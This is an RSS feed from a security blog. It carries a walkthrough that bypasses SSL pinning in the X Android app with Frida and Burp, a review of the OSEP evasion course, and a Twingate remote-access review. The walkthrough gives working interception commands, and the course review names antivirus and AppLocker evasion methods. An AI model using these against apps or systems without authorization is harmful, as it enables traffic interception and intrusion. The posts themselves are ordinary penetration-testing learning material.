<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[4pfsec]]></title><description><![CDATA[All things Information Security]]></description><link>https://4pfsec.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1680980849119/3XFlv22NX.png</url><title>4pfsec</title><link>https://4pfsec.com</link></image><generator>RSS for Node</generator><lastBuildDate>Sun, 17 May 2026 03:04:11 GMT</lastBuildDate><atom:link href="https://4pfsec.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[SSL Pinning bypass (Android Emulator)]]></title><description><![CDATA[Over the weekend, I was taking a look at an application which implemented SSL pinning. Here's the technique I used to bypass pinning and view the raw requests sent to the application server which then helped me to uncover crucial details about the ap...]]></description><link>https://4pfsec.com/ssl-pinning-bypass</link><guid isPermaLink="true">https://4pfsec.com/ssl-pinning-bypass</guid><category><![CDATA[bypass ssl pinning]]></category><category><![CDATA[ssl pinning]]></category><category><![CDATA[Android Emulator]]></category><category><![CDATA[pentesting]]></category><category><![CDATA[android app development]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sun, 14 Jan 2024 17:37:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1705253859755/7efb51a7-b76d-4576-b48c-26f9f42768e6.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the weekend, I was taking a look at an application which implemented SSL pinning. 
Here's the technique I used to bypass pinning and view the raw requests sent to the application server which then helped me to uncover crucial details about the application's functionality.</p>
<hr />
<h1 id="heading-prerequisites">Prerequisites</h1>
<ul>
<li><p>An Android emulator of your choice</p>
</li>
<li><p>Burp Suite (installed on the host machine)</p>
</li>
<li><p>Python packages</p>
<ul>
<li><p><code>objection</code></p>
<p>  If you face issues post-installation:</p>
<pre><code class="lang-plaintext">  pip install --upgrade setuptools
</code></pre>
</li>
<li><p><code>frida</code></p>
</li>
<li><p><code>frida-tools</code></p>
</li>
</ul>
</li>
</ul>
<hr />
<h1 id="heading-configure-burp-proxy">Configure Burp Proxy</h1>
<p><code>on host</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705250826510/1ff63945-7476-4242-92f2-4bbf5daa503a.png" alt class="image--center mx-auto" /></p>
<p><code>on emulator</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705250862153/fce6cfa4-63a0-497e-b005-381644fc9592.png" alt class="image--center mx-auto" /></p>
<hr />
<h1 id="heading-install-certificate-onto-emulator">Install Certificate onto emulator</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705251164775/f8894acf-6ba4-468d-a4f2-6cff31144438.png" alt class="image--center mx-auto" /></p>
<p>Launch the browser and head to <code>http://burp</code> and download the CA Certificate.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705251608214/dfd5cbd8-0468-432b-b353-8450fd2c1f81.png" alt class="image--center mx-auto" /></p>
<p>Make sure to rename the cert to <code>&lt;name&gt;.cer</code> via the file manager.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705251826042/e969a6d5-8852-40cf-8f2f-7349b6306879.png" alt class="image--center mx-auto" /></p>
<p>Then head to the certificate settings on the respective emulator and install the newly downloaded certificate.</p>
<hr />
<h1 id="heading-frida-server">Frida Server</h1>
<p><a target="_blank" href="https://github.com/frida/frida/releases">Releases · frida/frida (github.com)</a></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705251928126/4b37472e-bbaf-412c-80bd-cd64a2ec23c7.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252120384/7e1fcae0-b7b9-4388-aab7-8ec122422a1a.png" alt class="image--center mx-auto" /></p>
<p>Download the frida-server release that matches your emulator's architecture and your installed Frida version, extract it, and move the binary to the bin directory of your emulator. In my case: <code>D:\Program Files\Nox\bin</code></p>
<pre><code class="lang-plaintext">adb devices
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252247247/b6b2d817-6e76-4eb1-a701-f747bc74df34.png" alt class="image--center mx-auto" /></p>
<p>Verify that ADB lists the emulator as an attached device.</p>
<pre><code class="lang-plaintext">adb push frida /data/local/tmp
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252305322/26bd5a28-e1c9-488a-86a0-0ee5d3b681d7.png" alt class="image--center mx-auto" /></p>
<p>Push the frida binary to the device via ADB.</p>
<pre><code class="lang-plaintext">D:\Program Files\Nox\bin&gt;adb shell

cd /data/local/tmp/
chmod +x frida
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252496167/10a418d7-79f9-4b71-a2ce-747e41955f27.png" alt class="image--center mx-auto" /></p>
<p>Give the binary execute permissions.</p>
<pre><code class="lang-plaintext">./frida &amp;
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252534251/0387b7cd-4991-4063-a155-d85e465c870b.png" alt class="image--center mx-auto" /></p>
<p>Run the Frida server in the background.</p>
<hr />
<h1 id="heading-bypass-ssl-pinning">Bypass SSL Pinning</h1>
<p>There are a ton of scripts developed by the community for frida which you can find <a target="_blank" href="https://codeshare.frida.re/">here</a>. We'll be making use of the <code>frida-multiple-unpinning</code> script for our use case.</p>
<pre><code class="lang-plaintext">frida --codeshare akabe1/frida-multiple-unpinning -U -f com.twitter.android
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252663468/cf81b425-db49-42d0-9ab6-64f0492a4017.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252808046/40eeb861-3e66-40d0-9770-bec1960a57e4.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705252949401/69086f33-6ee7-4f32-832b-dc235cb2197f.png" alt class="image--center mx-auto" /></p>
<p>We can verify that the <code>X</code> (formerly <code>twitter</code>) app has launched and that the SSL pinning bypass is in effect.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705253043809/ad283116-3ab6-4ceb-a0dd-3404a089e76f.png" alt class="image--center mx-auto" /></p>
<p>We can then look at Burp and confirm that we can see the raw requests sent by the <code>X</code> app to its API server.</p>
]]></content:encoded></item><item><title><![CDATA[OSEP - Advanced Evasion
Techniques and Breaching Defenses - Review (2023)]]></title><description><![CDATA[Introduction
For the last three months, I've been working through the PEN300 course by OffSec which is all about advanced evasion and breaching defenses. Just got news from OffSec that I passed the 48-hour exam, and I wanted to share how I got the OS...]]></description><link>https://4pfsec.com/osep</link><guid isPermaLink="true">https://4pfsec.com/osep</guid><category><![CDATA[#cybersecurity]]></category><category><![CDATA[redteaming]]></category><category><![CDATA[offensive-security]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Certification]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sat, 23 Dec 2023 14:22:47 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1703341241724/71442a71-62b2-4150-bff7-5483fade1f9f.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-introduction">Introduction</h1>
<p>For the last three months, I've been working through the PEN300 course by OffSec which is all about advanced evasion and breaching defenses. Just got news from OffSec that I passed the 48-hour exam, and I wanted to share how I got the OSEP certification and what helped me along the way.</p>
<hr />
<h1 id="heading-overview-of-the-course-pen300">Overview of the Course (PEN300)</h1>
<h2 id="heading-programing-theory-amp-ms-office">Programming Theory &amp; MS Office</h2>
<p>The PEN-300 course, focusing on Advanced Evasion Techniques and Breaching Defenses, spans multiple learning modules. The initial few chapters provide a general course overview, covering Operating System, Programming Theory and Client-Side Code Execution with MS Office.</p>
<p>Programming Theory forms a significant part of the course, exploring areas such as executing shellcode in Word Memory, PowerShell utilization, and the intricacies of client-side code execution. The course covers creating a basic dropper in Jscript, execution with Windows Script Host, and revisiting in-memory PowerShell techniques.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703335971770/9ceb0b7e-dc4f-4eec-8d22-af9b56150034.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-antivirus-evasion">Antivirus Evasion</h2>
<p>Process Injection and Migration introduce concepts like antivirus evasion, DLL injection, reflective DLL injection, and process hollowing. Practical considerations, such as simulating target environments, locating signatures in files, and bypassing antivirus with various methods, are also heavily covered to expand the student's understanding of antivirus evasion.</p>
<p>Antimalware Scan Interface (AMSI) bypass techniques using PowerShell and JScript were also covered. The module provides comprehensive strategies for bypassing AMSI. The Application Whitelisting section delves into theories and setups, exploring basic bypasses and techniques to overcome AppLocker restrictions using PowerShell, C#, and JScript.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703335925321/3fb41915-a03e-47d6-8c81-6141881dab1b.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-network-filters">Network Filters</h2>
<p>Bypassing Network Filters covers strategies for overcoming DNS filters, web proxies, IDS and IPS sensors, and full packet capture devices. Techniques like HTTPS inspection, domain fronting, and DNS tunneling are explored in detail. Domain Fronting was one of my favorite sections of the course.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703335944945/7d88e106-ff05-4ce5-b33b-d082ba9722ed.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-post-exploitation">Post Exploitation</h2>
<p>The course extends its reach to Linux post-exploitation, kiosk breakouts, and lateral movement. Practical insights are provided on Linux lateral movement, Microsoft SQL attacks, Active Directory exploitation, and SSH lateral movement.</p>
<p>Windows Credentials modules cover aspects like local and domain credentials, Kerberos, and post-exploitation processing. Techniques for lateral movement with Remote Desktop Protocol (RDP), fileless lateral movement, and exploitation of Microsoft SQL in Active Directory are also comprehensively explored in the later chapters.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703335958765/70eab1da-0a70-4b4b-84c7-e25749d3ed0b.png" alt class="image--center mx-auto" /></p>
<hr />
<h1 id="heading-my-preparation-journey">My Preparation Journey</h1>
<h2 id="heading-course-module-labs">Course Module Labs</h2>
<p>Alongside the PEN-300 course are the interactive labs that complement each section, providing hands-on experiences for students. These labs are aligned with the specific tactics covered in each chapter, allowing students to actively apply the newly acquired knowledge in a practical setting. I heavily utilized these labs to repeatedly practice the tactics taught in the section.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703337727388/3544790e-4620-4d36-8e5c-a0b0e1a185af.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-challenge-labs">Challenge Labs</h2>
<p>The challenge labs represent an extra layer of complexity beyond the interactive labs. Within these labs, students encounter six separate networks featuring a mix of Windows and Linux hosts operating in an Active Directory environment, all fortified with active antivirus (AV) protection (Windows Defender). Students are tasked with navigating through these challenging scenarios, putting into practice the skills and techniques acquired throughout the course.</p>
<p>The challenge labs serve as a practical assessment, requiring students to apply their knowledge to overcome real-world obstacles and providing a comprehensive test of their proficiency in the techniques taught throughout the course. I personally made full use of these six networks to try out the various TTPs taught and used them as my own cyber range.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703337709091/b8062ff9-0f8d-4a22-b14a-b1e98aac47ed.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-external-labs">External Labs</h2>
<p>I personally didn't utilize any external labs other than a tiny AD lab I have in my home lab. However, many past students I spoke to recommended the Hack The Box Pro Lab Cybernetics for some extra practice. A lot of the students I spoke to told me that this was a very good addition to the challenge labs and helped them gain more confidence with their methodologies.</p>
<h2 id="heading-course-content">Course Content</h2>
<p>I was going through the content at a steady rate alongside the specific chapter's labs. I preferred doing it as I was learning compared to some students who read through the content completely before heading to the labs for some hands-on.</p>
<hr />
<h1 id="heading-challenges-and-learnings"><strong>Challenges and Learnings</strong></h1>
<h2 id="heading-c">C#</h2>
<p>I wasn't particularly proficient in C#, especially when it came to building loaders and bypasses, which were emphasized in the course. However, I found that I didn't need an extensive knowledge of C#. Basic skills in the language, coupled with a solid understanding of fundamental antivirus (AV) bypass techniques, were sufficient for me to navigate through the challenges presented in the course.</p>
<h2 id="heading-macros">Macros</h2>
<p>Handling MS Office macro malware proved to be quite challenging in my personal experience, especially with Office 2016, as it runs in a 32-bit context. Migrating to another 64-bit process without a C2 framework added an extra layer of annoyance. Nevertheless, the course provides a foundational understanding, covering the basics. This knowledge is adequate for students to build upon and extend into a practical working solution.</p>
<h2 id="heading-applocker-constrained-language-mode">Applocker + Constrained Language Mode</h2>
<p>Navigating around Applocker and Constrained Language Mode presented a variety of options, which initially proved confusing for me, given that it was my first encounter with both simultaneously. However, after experimenting in the labs and learning through trial and error, I managed to find efficient solutions. It turned out to be a rather enjoyable challenge once I got the hang of it.</p>
<hr />
<h1 id="heading-the-exam">The Exam</h1>
<h2 id="heading-exam-network">Exam Network</h2>
<p>The exam consists of one large network with multiple machines that must be compromised. Students are given 48 hours (47 hours and 45 minutes to be exact) to complete the examination and another 24 hours for report writing. The exam objective provides detailed explanations on how a student can pass the examination. In general, you must have 10 flags each worth 10 points.</p>
<p>The student would have to first obtain a foothold and then perform additional internal attacks following the initial compromise. There are multiple attack paths through the network that will result in the same level of compromise.</p>
<blockquote>
<p>Some of the machines will require multiple exploitation steps, resulting first in low-level local access, and then in root or administrative privilege escalation. Other machines will be fully exploitable remotely.</p>
<p>- OffSec</p>
</blockquote>
<p>In my personal experience, I found the difficulty level of the exam to be reasonable when compared to the content covered in the course. Everything necessary to pass the exam is included in the course materials; you just need to make a few extensions to your understanding and skills.</p>
<hr />
<h1 id="heading-tips-for-future-test-takers">Tips for Future Test-takers</h1>
<h2 id="heading-tools">Tools</h2>
<p>Throughout the course, various tools and techniques are introduced. If you lack a tool or if it's an open-source tool without a public release, ensure to pre-compile and test it in the labs before the exam. Avoid wasting valuable time during the exam on these tasks.</p>
<h2 id="heading-techniques">Techniques</h2>
<p>There are multiple ways to get to the same destination. Try every possible method/tool/technique to achieve the same goal. Things that work in certain environments do not work in others. I learnt this the hard way. Thankfully it was in the labs instead of the exam.</p>
<p>For instance, one of my interactive CLM bypasses refused to work in one of the labs and my interactive shell would simply die. However, running the commands in a PowerShell Runspace would succeed. Things like this I would've never known if I hadn't tried.</p>
<h2 id="heading-labs">Labs</h2>
<p>This is an obvious one. Redo the labs and practice note taking alongside. Doing it once doesn't suffice (unless you're doing this as your day job).</p>
<hr />
<h1 id="heading-conclusion">Conclusion</h1>
<p>In conclusion, the journey to obtaining the OSEP certification through the PEN-300 course has been a challenging yet immensely rewarding experience. Over the course of three months, I delved into advanced evasion techniques, breached defenses, and honed my skills in a dynamic and practical setting.</p>
<p>The exam, while appropriately challenging, proved manageable with the knowledge gained from the course. The emphasis on practical skills and the provision of necessary resources within the course materials made the exam preparation a smoother process. A piece of advice for future test-takers: familiarize yourself with tools beforehand, avoiding unnecessary hurdles during the exam.</p>
<p>Overall, the OSEP certification journey has not only expanded my technical capabilities but has also instilled a problem-solving mindset crucial in the realm of offensive security.</p>
<hr />
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703340804094/8a7a6c41-5898-42d0-85f8-dcebe79cf9da.png" alt class="image--center mx-auto" /></p>
<hr />
]]></content:encoded></item><item><title><![CDATA[Twingate: The Future of Remote Access]]></title><description><![CDATA[Introduction
Twingate is a cloud-based service that provides secured remote access to an organization’s networks. It’s function is very similar to a business VPN. Twingate makes Zero Trust Network Access (Yes, Buzzword. I know) easy to deploy, even e...]]></description><link>https://4pfsec.com/twingate</link><guid isPermaLink="true">https://4pfsec.com/twingate</guid><category><![CDATA[zerotrust]]></category><category><![CDATA[vpn]]></category><category><![CDATA[remote access]]></category><category><![CDATA[Work from home]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Mon, 28 Aug 2023 23:07:11 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1693263929803/bc1c7cbc-428f-4487-9c3b-68a971a5f0ea.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693258192870/e005dd58-9787-4634-a30d-062ee3f02ec0.png" alt class="image--center mx-auto" /></p>
<h1 id="heading-introduction">Introduction</h1>
<p>Twingate is a cloud-based service that provides secured remote access to an organization’s networks. Its function is very similar to a business VPN. Twingate makes <strong>Zero Trust</strong> <strong>Network Access</strong> <s>(Yes, Buzzword. I know)</s> easy to deploy, even easier to use, and always secure. It establishes direct peer-to-peer connections to protected resources, with each request verified before it ever leaves the device.</p>
<hr />
<h1 id="heading-how-twingate-is-revolutionizing-remote-access">How Twingate is Revolutionizing Remote Access</h1>
<h2 id="heading-resources-based-access">Resources Based Access</h2>
<p>Most commercial VPNs allow you to access internal networks whereas Twingate allows the declaration of individual resources as shown below:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693259244255/faac802a-59c3-4e9c-b1e8-64d87fd7ca6c.png" alt class="image--center mx-auto" /></p>
<p>A resource on your network can be any of the following:</p>
<ul>
<li><p>A Fully Qualified Domain Name (FQDN), eg. <code>host.autoco.internal</code></p>
</li>
<li><p>An FQDN using one or more wildcards, eg. <code>*.host-0?.autoco.internal</code>, where <code>*</code> represents 0 or more characters and <code>?</code> represents exactly 1 character.</p>
<ul>
<li>Wildcards like <code>*.autoco.internal</code> match anything to the left of <code>.autoco.internal</code></li>
</ul>
</li>
<li><p>An IP address, eg. <code>10.1.0.35</code></p>
</li>
<li><p>A valid IP CIDR range, eg. <code>10.1.0.0/16</code></p>
</li>
</ul>
<p>The underlying reason for declaring network resources in such a manner will become apparent in the next few sections.</p>
<h2 id="heading-native-access-control-lists">Native Access Control Lists</h2>
<p>Twingate uses Access Control Lists (ACLs) to secure resources both internally and externally. ACLs consist of tables that define access permissions for network resources. They are built into network interfaces and operating systems, and can also be enabled through Windows Active Directory.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693258800836/13360211-333f-41a0-8f0f-98eab2cd4fe1.png" alt class="image--center mx-auto" /></p>
<p>When onboarding a new resource, the admin is able to entirely control Port restrictions and Internal Domain names as shown above. Most traditional VPNs do allow subnet routing. However, resource-specific rules and restrictions have to be configured on your internal firewall. That changes with Twingate.</p>
<p>Twingate also offers granular permissions which allow you to define access to individual resources with custom policies and groups, enabling narrow access permissions. This kind of implementation has become a basic necessity in a world where people <strong>work from anywhere</strong>.</p>
<h2 id="heading-users-amp-groups-aaa-like">Users &amp; Groups (AAA-like)</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693259692323/bf0ca4cf-be27-4d1b-bf02-83c352b26697.png" alt class="image--center mx-auto" /></p>
<p>Now that we've declared our network resources and set up restrictions, let's take a look at what makes Twingate so special.</p>
<p>Traditional VPNs require the remote user to establish a connection to the VPN server and, once they prove they are an authorized user, they are granted access to the network behind the server, as if they were sitting at a computer in the office and on the network.</p>
<p><img src="https://campus.barracuda.com/resources/attachments/image/96026161/1/star_shaped_topology.png" alt="VPN Tunnels in Star-Shaped Topologies | Barracuda Campus" /></p>
<p>Larger companies may also have multiple networks which need to communicate with each other. This requires building a complicated network of VPN connections between them and letting users connect to multiple VPN servers.</p>
<p><img src="https://www.twingate.com/static/f1b7eca78f31c25b260e2d0756b43ccc/32749/hero.png" alt="Zero Trust Network Access made simple | Twingate" /></p>
<p>This is where Twingate's <strong>Zero Trust Networking</strong> comes into play. ZTN, a network access framework, operates on the fundamental premise that both the network itself and the users seeking to reach corporate assets are treated as untrusted, hence the term "zero trust." Given this premise, maintaining security requires inspecting and validating every attempt to reach a private resource. This validation includes confirming that the user is who they claim to be (authentication) and determining whether they are entitled to reach the specific resource in question (authorization).</p>
<h3 id="heading-how-it-works">How it works:</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260387943/94ed32ac-b46c-414a-88bc-6174161eb786.png" alt class="image--center mx-auto" /></p>
<p>We have 2 active users declared in our network.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260449141/2cba5938-d90f-4eba-a435-ed490c45ad1a.png" alt class="image--center mx-auto" /></p>
<p>We also have 3 operational groups.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260495530/d29720c0-d1f5-4f65-bf21-2e5bd0b2d40e.png" alt class="image--center mx-auto" /></p>
<p>We're able to assign active users to operation groups as shown above.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260641772/024cf0f6-af0d-41b3-baaf-f71e7d17455c.png" alt class="image--center mx-auto" /></p>
<p>We are able to assign groups to resources which determines their access to the resource.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260613324/37a8f09e-a00f-4ad3-8840-c411763a143d.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693260830182/ce125f3c-efa2-4a4a-9c99-67a479ae9b62.png" alt class="image--center mx-auto" /></p>
<p>The configuration is pretty modular as shown above and we are also able to assign multiple groups to a particular resource.</p>
<hr />
<h1 id="heading-architecture">Architecture</h1>
<p><img src="https://www.twingate.com/static/4fd5198931456977b625ebf339ce997d/1e088/abc-Twingate-Overview.png" alt /></p>
<p>Twingate relies on four main components:</p>
<ul>
<li><p>Controller</p>
</li>
<li><p>Clients</p>
</li>
<li><p>Connectors</p>
</li>
<li><p>Relays</p>
</li>
</ul>
<p>Together, they ensure that only authenticated users are able to access the Resources that they have been authorized to access. Here's how they all work in conjunction.</p>
<h2 id="heading-controller">Controller</h2>
<p>The Controller's responsibilities encompass various tasks such as storing configuration changes from the Admin console, delegating user authentication to third-party identity providers, and generating access control lists (ACLs) for both clients and connectors. These ACLs define authorized resource access for users and network destinations for connectors. The Controller also plays a role in registering and authenticating deployed connectors, requiring one-time authorization and establishing anonymized unique IDs for identification, ensuring secure communication with Twingate Clients.</p>
<h2 id="heading-client">Client</h2>
<p>The Twingate Client application (pretty self-explanatory, like OpenVPN Connect), installed on users' devices, serves as the authentication and authorization proxy for user requests to private Resources. It establishes TLS tunnels with designated Connectors, which ensures secure and efficient access to protected Resources, all orchestrated at the Client's edge.</p>
<h2 id="heading-connector">Connector</h2>
<p>The Connector, serving as the counterpart to the Client, takes on a simpler yet significant role. Designed to be placed behind a private Remote network's firewall, the Connector's core responsibilities include establishing and maintaining communication with the Controller. (Basically the node inside your network, something like an Argo tunnel.)</p>
<h2 id="heading-relay">Relay</h2>
<p>The Relay is the simplest component in the Twingate architecture. No data or network-identifiable information is stored in the Relay and no data-carrying connections are terminated at the Relay. The Relay can be considered to be the equivalent of a TURN server in WebRTC nomenclature.</p>
<hr />
<h1 id="heading-access">Access</h1>
<h2 id="heading-desktop">Desktop</h2>
<p>Accessing your remote resource is as simple as downloading your corresponding agent from <a target="_blank" href="https://www.twingate.com/download">their website</a> and blazing through the following steps.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261425644/6fdf036b-6984-4a43-b53f-915d097c6aa8.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261511701/cadd66aa-5f18-4b01-b562-cbe77fbb9491.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261506377/5814682a-f75a-4e22-b931-954763e89c95.png" alt class="image--center mx-auto" /></p>
<p>Once authenticated successfully, you should only see resources that have been delegated to you or the group that you belong to. It's that simple. You can now access that resource without any issues.</p>
<pre><code class="lang-powershell">ssh ubuntu@192.168.18.18
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261569910/a7b05c39-4ca3-4d7a-8789-86c312654fca.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-mobile">Mobile</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262802220/b703870c-9601-4dd6-8941-03ff6361883d.jpeg" alt class="image--center mx-auto" /></p>
<p>And that's it! Additionally, if you were on a traditional VPN, your general network traffic (by default) would flow through the VPN server which exhausts the VPN Server's bandwidth unnecessarily forcing the server to be scaled. With Twingate, your general traffic goes out through your device's network card unless specified otherwise.</p>
<hr />
<h1 id="heading-logging">Logging</h1>
<h2 id="heading-recent-activity">Recent Activity</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261761282/7f6e9986-6a89-41f0-a1b1-b5a262a46821.png" alt class="image--center mx-auto" /></p>
<p>Twingate allows the admins to track recent activities related to each resource.</p>
<h2 id="heading-reports">Reports</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262033648/5b1379ef-a5f4-4dc5-9ee4-becab57d9b70.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693261971600/2ee45c0f-1ae6-4700-b5ec-f767031ae75c.png" alt class="image--center mx-auto" /></p>
<p>Twingate also allows admins to generate reports in bulk and review them as shown:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262107012/b7984e43-c237-4cd3-8247-3ca02d0d763b.png" alt class="image--center mx-auto" /></p>
<hr />
<h1 id="heading-setup-process">Setup Process</h1>
<p>The setup process is fairly straightforward.</p>
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>An in-house node running 24/7</li>
</ul>
<h2 id="heading-installation">Installation</h2>
<h3 id="heading-remote-network">Remote Network</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262269124/58d9a34f-1727-4801-b3d1-165af8ba9319.png" alt class="image--center mx-auto" /></p>
<p>The first step is to add a remote network. Give it any name you like and select the location accordingly.</p>
<h3 id="heading-connector-1">Connector</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262311009/4f9fbac0-cf80-4080-90b9-4fd90ec21740.png" alt class="image--center mx-auto" /></p>
<p>The next step is to install the connector on our local node. There are plenty of deployment methods to choose from and, as expected, I went with Docker.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262362863/0477585e-aef0-42dc-ab83-af856f05bb96.png" alt class="image--center mx-auto" /></p>
<p>Configure the connector to your liking and paste the generated command into your node as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262386792/07d5a41a-6511-4725-8a92-de086265193b.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262409493/c23ed36b-6748-475d-a01b-4aa44239804a.png" alt class="image--center mx-auto" /></p>
<p>Once we see that the connector is up, we are ready to go. Note that Twingate does provide two connectors per remote network by default, for redundancy.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693262516587/f595628d-3e32-4233-81fa-ed9dff3edb87.png" alt class="image--center mx-auto" /></p>
<p>Now we're ready to add resources, port restrictions, users &amp; groups as discussed above! It's that simple.</p>
<hr />
<h1 id="heading-conclusion">Conclusion</h1>
<h2 id="heading-pros">Pros (+)</h2>
<ul>
<li><p>Extremely simple setup &amp; management process for admins</p>
</li>
<li><p>Extensive ACL control over resources</p>
</li>
<li><p>Lessens company network load by directing non-business data straight to the internet</p>
</li>
<li><p>Handles DNS queries within the remote network, preserving typical hostnames and IP functionality.</p>
</li>
<li><p>Wide support for client operating systems</p>
</li>
</ul>
<h2 id="heading-cons">Cons (-)</h2>
<ul>
<li><p>Involvement of an external entity (Twingate) in your system access</p>
<ul>
<li>They explain their limited access extensively in their <a target="_blank" href="https://www.twingate.com/docs/how-twingate-works">docs</a> and state that they have no access to your data.</li>
</ul>
</li>
<li><p>Possibly not a fit for organizations with strict security or privacy requirements</p>
</li>
</ul>
<p>Remote access solutions are moving towards zero trust security. According to Forbes, implementing a zero trust access (ZTA) solution instead of a traditional secure remote access solution delivers one of the best frameworks for today’s digital era. It operates on the principle of “never trust, always verify”: users and devices are continuously authenticated and authorized before they can reach the resources assigned to them.</p>
<p>ZTA helps protect against everything from commodity malware to advanced persistent threats and insider threats. It can not only prevent attacks outright but also stop lateral movement or otherwise contain an attack in progress.</p>
<p>PSA: there are a few other tools that achieve the same goals as Twingate without depending on an external entity for access to your private systems (e.g. ZeroTier, Nebula).</p>
<hr />
<h3 id="heading-follow-up">Follow up (?)</h3>
<p>I might discuss how tools like these can be used by attackers to run around in your network 🥲.</p>
<hr />
<p>-Nee</p>
]]></content:encoded></item><item><title><![CDATA[CPTS - HTB Certified Penetration Testing Specialist - Review (2023)]]></title><description><![CDATA[Introduction
Having spent a considerable amount of time immersed in web-related attacks in the AWAE labs over the last 4 months, I began to feel a sense of detachment from the realm of Active Directory (AD) exploitation and pivoting. Now that I was d...]]></description><link>https://4pfsec.com/cpts</link><guid isPermaLink="true">https://4pfsec.com/cpts</guid><category><![CDATA[penetration testing]]></category><category><![CDATA[offensive-security]]></category><category><![CDATA[hack-the-box]]></category><category><![CDATA[redteaming]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Wed, 14 Jun 2023 20:11:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1686773421547/0e93a498-21f7-4ef5-a85c-20a943659480.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-introduction">Introduction</h1>
